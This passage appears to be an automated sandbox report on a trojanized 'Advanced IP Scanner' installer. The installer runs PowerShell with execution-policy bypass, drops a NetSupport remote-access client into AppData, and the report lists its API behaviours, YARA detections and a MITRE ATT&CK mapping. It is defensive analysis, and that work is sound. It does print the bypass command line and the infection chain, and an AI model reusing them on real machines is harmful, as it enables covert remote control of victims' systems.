Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1"

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_110F2280 GetTickCount,LogonUserA,GetTickCount,GetLastError,

7_2_110F2280

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11027BE0 keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,

7_2_11027BE0

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,

7_2_1109D4A0

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1109DC20 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

7_2_1109DC20

Source: client32.exe, 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: Progman

Language, Device and Operating System Detection

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	7_2_11170208
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	7_2_1117053C
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_11170499
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoA,	7_2_11167B5E
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	7_2_11170106
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	7_2_111701AD
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_11170011
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	7_2_111703D9
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_11170500
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	7_2_685CDB7C
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_685CDC56
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_685C1CC1
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoA,	7_2_685CDC99
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	7_2_685C1DB6
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	7_2_685C1E5D
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	7_2_685C1EB8
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	7_2_685C2089
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: EnumSystemLocalesA,	7_2_685C2151
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_685C2175
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_685C21DC
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	7_2_685C2218
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,	7_2_687E888A
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	8_2_1117053C
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoA,	8_2_11167B5E
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_11170011
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	8_2_11170500
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	8_2_11170499

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1101D180 __time64,SetRect,GetLocalTime,

7_2_1101D180

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1103B220 _calloc,GetUserNameA,_free,_calloc,_free,

7_2_1103B220

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

7_2_1109D4A0

Remote Access Functionality

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_6859A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,

7_2_6859A980

Yara detected NetSupport remote tool

Source: Yara match	File source: 8.2.client32.exe.688b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.688b0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.688b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.68890000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.68890000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.68890000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.68590000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2083867183.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1985766789.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4190638856.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2164943299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.2081672435.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.2163165064.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2038454722.00000000076DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2042967524.000000000878D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2083140759.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2164182999.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 8168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 4564, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	11 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Native API	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	22 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	11 Software Packing	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	11 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Search Order Hijacking	LSA Secrets	33 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	2 Masquerading	Cached Domain Credentials	151 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
